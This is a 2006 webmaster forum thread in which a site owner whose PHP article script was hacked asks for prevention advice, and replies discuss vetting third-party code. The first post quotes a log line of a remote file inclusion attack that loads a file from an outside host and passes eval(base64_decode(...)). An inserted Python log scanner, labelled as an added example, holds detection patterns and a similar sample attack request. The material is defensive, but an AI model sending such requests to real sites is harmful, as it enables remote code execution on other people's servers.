My website got hacked

article script

         

atpservices

8:32 pm on Feb 17, 2006 (gmt 0)

10+ Year Member



I was running an article script on my site and got this message from my hosting company last night, good thing they are on the ball.

Wondering if someone can give me some advice on how to prevent this from happening to my site...

I was running an article script.

Here is a summary of the message from my host:

They noticed a ton of outbound connections from their server to various IP addresses on HTTP proxy ports. This was traced to my account, and they said this was an example of one of the hacks:

81.209.148.205 - - [16/Feb/2006:17:30:41 -0500] "GET http://www.example.com//index.php?page=http://othersite.host.tldk/settings/config.inc&s=eval%28base64_decode%28%27ICAkRiA9ICRfR

They said whatever software I am using as the index.php for my site was coded extremely poorly and allows for remote users to run commands on our server via your index.php.

Thanks
ATP

[edited by: jatar_k at 8:51 pm (utc) on Feb. 17, 2006]
[edit reason] no urls or email excerpts thanks [/edit]
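
The request in the host's log excerpt carries a URL as the value of `page` and PHP code in `s`. As an added example (not part of the original thread or of the poster's script), this Python script scans Apache-style access log lines for those two patterns; the log lines, addresses, the `url_ok` parameter and the lists of wrappers and function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Start of an Apache common/combined log entry, up to the request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)')
# A parameter value that is itself a URL or PHP stream wrapper (assumed list).
REMOTE_VALUE = re.compile(r'^(?:https?|ftps?|php|data|expect)://', re.I)
# PHP function calls that do not belong in a query string (assumed list).
CODE_MARKERS = re.compile(
    r'\b(?:eval|base64_decode|system|passthru|shell_exec)\s*\(', re.I)

# Constructed sample lines: a normal hit, a request shaped like the one the
# host reported, and a parameter that legitimately carries a URL.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Feb/2006:17:29:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Feb/2006:17:30:41 -0500] "GET http://www.example.com//index.php'
    '?page=http://files.example.net/settings/config.inc'
    '&s=eval%28base64_decode%28%27QUJD%27%29%29 HTTP/1.1" 200 312',
    '192.0.2.10 - - [16/Feb/2006:17:31:10 -0500] "GET /index.php?page=contact'
    '&ref=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 200 4800',
]

def inspect_line(line, url_ok=frozenset()):
    """Return (parameter, reason) findings for one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes values, so eval%28 is seen as eval(
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in url_ok and REMOTE_VALUE.match(value):
            findings.append((name, "remote URL as parameter value"))
        if CODE_MARKERS.search(value):
            findings.append((name, "PHP code in parameter value"))
    return findings

def scan(lines, url_ok=frozenset()):
    """Return [(client_ip, findings)] for every line with at least one finding."""
    hits = []
    for line in lines:
        found = inspect_line(line, url_ok)
        if found:
            hits.append((LOG_RE.match(line).group("ip"), found))
    return hits

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG, url_ok={"ref"}):
        print(ip, found)
```

Parameters that legitimately carry URLs go in `url_ok`; anything else the scan flags points at a parameter whose handling in the script deserves review.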

jezra

9:16 pm on Feb 17, 2006 (gmt 0)

10+ Year Member



Websites get hacked; people are malicious. So how does one avoid script exploitation?

You could always write your own code, test it, try to exploit it, do some research on how others exploit code, test again. However, this takes time and it may be more feasible to use code created by someone else. When deciding to use someone else's code, do some research. Is the code being actively developed? Is there a forum for discussing the code? When was the last security update released? How often are security updates released? When you finally decide upon a specific piece of code to use, join all forums and mailing lists that the code maintainers have, so that if a security issue arises, you will know about it and can act accordingly.

atpservices

11:00 pm on Feb 17, 2006 (gmt 0)

10+ Year Member



I hear you...
Doing some research. Has anyone ever used PHP encoding software to protect their code? I am considering buying a package. Then, if what I am reading is correct, I can use others' code and not have to worry about security threats.

vincevincevince

11:08 pm on Feb 17, 2006 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



PHP encoding will stop people stealing your code, sure, but it won't fix security holes.

What you need is to buy code from people who you can trust absolutely. Trust is the name of the game here. Or pay someone to investigate it.

Send the following email to any potential script's owners:


Dear Sir or Madam,

I am considering purchasing $scriptname for use on my website, and have a few security-related questions for you:

Have you had any reports about security flaws which are not yet resolved?
How have you protected yourself against SQL injection?
Does your script function perfectly with register_globals = off?
Have you sanitised all external data inputs?

Get the answers to these. If they seem good then use the script. If you have an SQL injection or unsanitised-data-based attack then phone your lawyer - you have, in writing, their assurance that these have been covered.